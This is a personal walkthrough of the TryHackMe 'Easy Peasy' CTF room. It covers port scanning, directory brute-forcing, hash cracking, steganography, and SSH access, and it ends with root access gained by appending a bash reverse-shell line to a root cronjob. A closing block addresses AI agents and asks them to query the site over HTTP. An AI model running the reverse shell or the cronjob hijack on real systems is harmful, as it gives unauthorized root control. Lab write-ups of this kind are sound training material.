# EasyPeasy
Try this challenge in [TryHackMe: **Easy Peasy**](https://tryhackme.com/r/room/easypeasyctf)
> I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: [TryHackMe: Easy Peasy Write-up by Kevin De Vijlder](https://medium.com/@kevin.de.vijlder/tryhackme-easy-peasy-write-up-b148ebed3c7e)
## Task 1: Enumeration through Nmap
### 1.1 How many ports are open?
Let's run a nmap scan to check the open ports on the IP assigned to us. Just r**eplace the 10.10.X.X to the IP given to you**.
```bash
nmap -sT -p 1-65535 10.10.X.X
```
{% hint style="info" %}
**`-sT`** (TCP connect scan)
{% endhint %}
*To answer the next two questions*, we’ll be running a nmap scan for the open ports:
### 1.2 What is the version of nginx?
### 1.3 What is running on the highest port?
```bash
nmap -p80,6498,65524 10.10.X.X -sV
```
## Task 2: Compromising the machine
### 2.1 Using GoBuster, find flag 1.
Run gobuster for ****
{% code overflow="wrap" %}
```bash
gobuster dir -u http://10.10.X.X/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```
{% endcode %}
We found out that there is a /hidden directory. Let's try to run gobuster for ****
{% code overflow="wrap" %}
```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X/hidden
```
{% endcode %}
Go to ****
Copy the hidden hash
To decrypt the hash, go to an online decrypter like [**https://hashes.com/en/decrypt/hash**](https://hashes.com/en/decrypt/hash) for faster results
### 2.2 Further enumerate the machine, what is flag 2?
Run gobuster for ****
{% code overflow="wrap" %}
```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X:65524
```
{% endcode %}
Check **`10.10.X.X:65524/robots.txt`**
In the `User-Agent` field, there’s a hash
To find the type of the hash, use [hash-identifier](https://github.com/blackploit/hash-identifier) module
{% code lineNumbers="true" %}
```bash
cd /hash-identifier
python3 hash-id.py
```
{% endcode %}
Decrypt hash using an online MD5 decrypter
### 2.3 Crack the hash with easypeasy.txt, What is the flag 3?
From our nmap scan, go to **`http://10.10.X.X:65524`**
Flag 3 is written in plain sight on the web page
### 2.4 What is the hidden directory?
When you View the Page Source of **`http://10.10.X.X:65524`**, a hidden field will be seen that has a hash.
We’ll use [CyberChef](https://gchq.github.io/CyberChef/) to decrypt hash from Base6X (explore options available in CyberChef)
### 2.5 Using the wordlist that was provided to you in this task crack the hash what is the password?
When you go to the hidden directory, you’ll see a picture
Save the image with its default name
We’ll use steganography to decode the message in the image
```bash
steghide --extract -sf bianrycodepixabay.jpg
```
But a passphrase is needed to decrypt this file
Let’s try to **View the Page Source** of the image page to get some clues. We indeed retrieved a hash.
Save the hash using the filename **hash.txt**
```bash
nano hash.txt
```
To decrypt the hash, use the **johntheripper** module
```bash
sudo /opt/john/john --wordlist=easypeasy.txt --format=gost hash.txt
```
### 2.6 What is the password to login to the machine via SSH?
Going back to the **steghide** module, enter the passphrase that we got.
A file **secrettext.txt** was extracted. Use this to view the contents of the file.
```bash
cat secrettext.txt
```
We’ll get a username **boring** and binary numbers that need to be decrypted
Use a Binary to Text converter tool online like this:
### 2.7 What is the user flag?
From our previous nmap scan, we’ll use the **port 6498 for the ssh access**
```bash
ssh boring@10.10.X.X -p 6498
```
{% code lineNumbers="true" %}
```bash
ls
cat user.txt
```
{% endcode %}
**From the Hint,** we got the term “Rotated”, which suggests that this may be encrypted with ROT13. Using CyberChef, we decrypt the flag.
### 2.8 What is the root flag?
From the description of this room, we are expected to **escalate our privileges through a vulnerable cronjob**
```bash
cat /etc/crontab
```
The cron job is located in **/var/www**
{% code lineNumbers="true" %}
```bash
cd /var/www
ls -la
```
{% endcode %}
We’ll see the cronjob **mysecretcronjob.sh** that said that will run as root.
```bash
cat .mysecretcronjob.sh
```
We can set up a **netcat** **listener** **in our machine** to have a reverse shell since the cronjob has root privileges.
```bash
nc -lvnp 5556
```
Let's craft our payload:
Get the reverse shell script from [pentestmonkey's reverse shell cheat sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) then **replace the contents of mysecretcronjob.sh**
```bash
echo "bash -i >& /dev/tcp/10.10.X.X/5556 0>&1" >> .mysecretcronjob.sh
```
*\*use your machine IP & port 5556*
Let's now wait for the cronjob to be executed to receive a shell
{% code lineNumbers="true" %}
```bash
cd /root
ls -la
```
{% endcode %}
{% hint style="success" %}
We can see the flag in the **.root.txt** file.
{% endhint %}
```bash
cat .root.txt
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.marialc.com/tryhackme-rooms/easypeasy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
.png?alt=media&token=d2627a79-0d9c-4c67-b438-0b25e4514edb)
.png?alt=media&token=9df6ec70-c6b7-4f1f-850f-3f6ba0b06253)
.png?alt=media&token=cfc11f9a-dc75-4137-8258-f3a1d99d6bf3)
